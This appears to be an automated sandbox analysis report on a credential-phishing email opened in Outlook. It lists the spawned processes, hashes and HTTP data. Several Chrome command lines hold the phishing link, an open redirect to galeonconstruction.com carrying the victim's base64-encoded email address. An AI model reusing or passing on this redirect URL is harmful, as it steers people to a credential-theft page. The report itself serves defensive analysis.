                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-bFFNoq2IYInlfzivt3YL-A' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-in8aGdQce9V9QJT4vnYsjA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                          Content-Length: 220
                                                                                                                          Date: Fri, 02 Feb 2024 19:19:10 GMT
                                                                                                                          Expires: Fri, 02 Feb 2024 19:19:10 GMT
                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Server: GSE
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:19:10 UTC220INData Raw: 72 6c 7a 43 31 3a 20 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 35 0a 72 6c 7a 43 32 3a 20 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 35 0a 72 6c 7a 43 37 3a 20 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 35 0a 64 63 63 3a 20 0a 73 65 74 5f 64 63 63 3a 20 43 31 3a 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 35 2c 43 32 3a 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 35 2c 43 37 3a 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 35 0a 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 2c 43 31 53 2c 43 37 53 0a 73 74 61 74 65 66 75 6c 2d 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 0a 63 72 63 33 32 3a 20 35 35 37 32 32 36 30 32 0a
                                                                                                                          Data Ascii: rlzC1: 1C1ONGR_enUS1095rlzC2: 1C2ONGR_enUS1095rlzC7: 1C7ONGR_enUS1095dcc: set_dcc: C1:1C1ONGR_enUS1095,C2:1C2ONGR_enUS1095,C7:1C7ONGR_enUS1095events: C1I,C2I,C7I,C1S,C7Sstateful-events: C1I,C2I,C7Icrc32: 55722602


                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:20:17:22
                                                                                                                          Start date:02/02/2024
                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\dudick SystemDesk Important Crediential Notification 1.eml
                                                                                                                          Imagebase:0x4c0000
                                                                                                                          File size:34'446'744 bytes
                                                                                                                          MD5 hash:91A5292942864110ED734005B7E005C0
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          Target ID:2
                                                                                                                          Start time:20:17:24
                                                                                                                          Start date:02/02/2024
                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "4D284E4F-3A7D-4622-868A-062F51C2E027" "7456C4E0-F4FD-42C9-A562-F537B3C4256C" "4412" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx
                                                                                                                          Imagebase:0x7ff7fc340000
                                                                                                                          File size:710'048 bytes
                                                                                                                          MD5 hash:EC652BEDD90E089D9406AFED89A8A8BD
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          Target ID:5
                                                                                                                          Start time:20:17:37
                                                                                                                          Start date:02/02/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==
                                                                                                                          Imagebase:0x7ff71e7f0000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:6
                                                                                                                          Start time:20:17:38
                                                                                                                          Start date:02/02/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2072,i,10138071190065889849,3391501485592805015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                          Imagebase:0x7ff71e7f0000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:9
                                                                                                                          Start time:20:17:47
                                                                                                                          Start date:02/02/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==
                                                                                                                          Imagebase:0x7ff71e7f0000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:10
                                                                                                                          Start time:20:17:48
                                                                                                                          Start date:02/02/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2008,i,13169059896536106163,9047257998414387997,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                          Imagebase:0x7ff71e7f0000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:12
                                                                                                                          Start time:20:18:20
                                                                                                                          Start date:02/02/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==
                                                                                                                          Imagebase:0x7ff71e7f0000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:13
                                                                                                                          Start time:20:18:21
                                                                                                                          Start date:02/02/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1616 --field-trial-handle=1988,i,16673131194630306312,13924574274350384022,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                          Imagebase:0x7ff71e7f0000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          No disassembly